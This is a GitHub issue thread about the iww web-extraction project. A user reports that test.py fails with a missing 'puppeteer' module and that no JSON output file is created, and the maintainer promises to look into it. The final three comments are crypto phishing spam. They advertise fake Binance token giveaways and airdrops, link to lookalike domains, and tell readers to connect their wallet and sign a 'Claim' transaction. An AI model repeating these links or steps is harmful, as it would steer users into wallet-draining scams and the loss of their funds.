### ISSUE TITLE
Unable to create json file

### ISSUE THREAD

**Issue by rish-hyun** [MohamedHmini/iww#5]
I have cloned the repo and ran test.py but it throws this error
```
/content/iww/iww/extractor/resources_extractor.js https://stackoverflow.com/questions/66102275/commanderjs-i-cant-get-value-from-option /content/iww/test.json
internal/modules/cjs/loader.js:883
  throw err;
  ^

Error: Cannot find module 'puppeteer'
Require stack:
- /content/iww/iww/extractor/resources_extractor.js
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:880:15)
    at Function.Module._load (internal/modules/cjs/loader.js:725:27)
    at Module.require (internal/modules/cjs/loader.js:952:19)
    at require (internal/modules/cjs/helpers.js:88:18)
    at Object.<anonymous> (/content/iww/iww/extractor/resources_extractor.js:1:19)
    at Module._compile (internal/modules/cjs/loader.js:1063:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1092:10)
    at Module.load (internal/modules/cjs/loader.js:928:32)
    at Function.Module._load (internal/modules/cjs/loader.js:769:14)
    at Function.executeUserEntryPoint [as runMain] (internal/modules/run_main.js:72:12) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [ '/content/iww/iww/extractor/resources_extractor.js' ]
}
Traceback (most recent call last):
  File "/content/iww/test.py", line 21, in <module>
    dm.retrieve_DOM_tree("./test.json")
  File "/content/iww/iww/utils/dom_mapper.py", line 44, in retrieve_DOM_tree
    file = open(self.DOM_file_path, 'r', encoding = 'UTF-8')
FileNotFoundError: [Errno 2] No such file or directory: '/content/test.json'
```

**Comment by rish-hyun** [comment]
I tried to manually run the code 
```
url = "https://www.plyable.com"
json_file = "plyable.json"

extractor.extract(
    url = url, 
    destination = json_file
)
```
Output
```
/content/iww/extractor/resources_extractor.js https://www.plyable.com /content/plyable.json
```

But no such file is created!

**Comment by MohamedHmini** [comment]
Hi ,
Thanks for ur concern, i will start maintaining the repo soon, as for ur issue i will get back to u within the next 24 hours.

**Comment by rish-hyun** [comment]
@MohamedHmini  Any updates? Also, is it possible to achieve this same functionality using selenium?

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @
